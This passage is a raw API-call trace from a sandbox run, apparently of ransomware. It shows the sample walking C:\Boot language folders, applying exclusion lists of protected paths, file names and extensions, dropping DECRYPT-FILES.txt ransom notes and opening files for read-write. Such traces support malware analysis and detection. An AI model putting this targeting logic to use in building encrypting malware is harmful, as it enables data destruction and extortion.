(lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.608] CloseHandle (hObject=0x0) returned 0 [0179.608] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.608] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.608] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.609] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.609] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.609] CloseHandle (hObject=0xffffffff) returned 0 [0179.609] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0179.609] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0179.609] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0179.609] lstrcatW (in: lpString1="hu-HU", lpString2="\\" | out: lpString1="hu-HU\\") returned="hu-HU\\" [0179.609] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="hu-HU\\" | out: lpString1="C:\\Boot\\hu-HU\\") returned="C:\\Boot\\hu-HU\\" [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Program Files") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch=":\\Windows") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Games\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\All Users") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="AhnLab") returned 0x0 [0179.609] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.609] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0179.609] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.609] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\hu-HU\\\\0a16c9.tmp") returned 25 [0179.609] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\\\0a16c9.tmp" (normalized: "c:\\boot\\hu-hu\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.609] GetLastError () returned 0x5 [0179.609] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0179.610] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.610] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\hu-HU\\\\DECRYPT-FILES.txt") returned 32 [0179.610] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\hu-hu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.611] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0179.611] lstrcatW (in: lpString1="C:\\Boot\\hu-HU\\", lpString2="*" | out: lpString1="C:\\Boot\\hu-HU\\*") returned="C:\\Boot\\hu-HU\\*" [0179.611] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.612] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.612] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.612] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.612] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.612] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.612] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.612] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.612] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.612] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.612] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.612] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.612] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0179.612] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.612] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\hu-HU\\" | out: lpString1="C:\\Boot\\hu-HU\\") returned="C:\\Boot\\hu-HU\\" [0179.612] lstrcatW (in: lpString1="C:\\Boot\\hu-HU\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\Boot\\hu-HU\\bootmgr.exe.mui" [0179.612] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.613] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.613] CloseHandle (hObject=0x0) returned 0 [0179.613] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.613] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.613] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.613] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.613] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.613] CloseHandle (hObject=0xffffffff) returned 0 [0179.613] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0179.613] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0179.613] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0179.613] lstrcatW (in: lpString1="it-IT", lpString2="\\" | out: lpString1="it-IT\\") returned="it-IT\\" [0179.613] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="it-IT\\" | out: lpString1="C:\\Boot\\it-IT\\") returned="C:\\Boot\\it-IT\\" [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Program Files") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch=":\\Windows") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Games\\") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.613] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.614] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\All Users") returned 0x0 [0179.614] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.614] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.614] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.614] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="AhnLab") returned 0x0 [0179.614] StrStrW (lpFirst="C:\\Boot\\it-IT\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.614] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0179.614] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.614] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\it-IT\\\\0a16c9.tmp") returned 25 [0179.614] CreateFileW (lpFileName="C:\\Boot\\it-IT\\\\0a16c9.tmp" (normalized: "c:\\boot\\it-it\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.615] GetLastError () returned 0x5 [0179.615] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0179.615] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.615] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\it-IT\\\\DECRYPT-FILES.txt") returned 32 [0179.615] CreateFileW (lpFileName="C:\\Boot\\it-IT\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\it-it\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.615] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0179.615] lstrcatW (in: lpString1="C:\\Boot\\it-IT\\", lpString2="*" | out: lpString1="C:\\Boot\\it-IT\\*") returned="C:\\Boot\\it-IT\\*" [0179.615] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.615] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.615] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.615] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.615] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.615] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.615] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.615] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.615] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.616] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.616] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.616] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.616] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0179.616] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.616] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\it-IT\\" | out: lpString1="C:\\Boot\\it-IT\\") returned="C:\\Boot\\it-IT\\" [0179.616] lstrcatW (in: lpString1="C:\\Boot\\it-IT\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\Boot\\it-IT\\bootmgr.exe.mui" [0179.616] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.616] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.616] CloseHandle (hObject=0x0) returned 0 [0179.616] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.616] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.616] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.616] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.616] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.616] CloseHandle (hObject=0xffffffff) returned 0 [0179.616] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0179.616] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0179.616] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0179.617] lstrcatW (in: lpString1="ja-JP", lpString2="\\" | out: lpString1="ja-JP\\") returned="ja-JP\\" [0179.617] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ja-JP\\" | out: lpString1="C:\\Boot\\ja-JP\\") returned="C:\\Boot\\ja-JP\\" [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Program Files") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch=":\\Windows") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Games\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\All Users") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="AhnLab") returned 0x0 [0179.617] StrStrW (lpFirst="C:\\Boot\\ja-JP\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.617] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0179.617] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.617] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\ja-JP\\\\0a16c9.tmp") returned 25 [0179.617] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\\\0a16c9.tmp" (normalized: "c:\\boot\\ja-jp\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.617] GetLastError () returned 0x5 [0179.617] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0179.617] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.617] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\ja-JP\\\\DECRYPT-FILES.txt") returned 32 [0179.617] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\ja-jp\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.618] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0179.618] lstrcatW (in: lpString1="C:\\Boot\\ja-JP\\", lpString2="*" | out: lpString1="C:\\Boot\\ja-JP\\*") returned="C:\\Boot\\ja-JP\\*" [0179.618] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.618] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.618] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.618] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.618] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.618] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.618] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 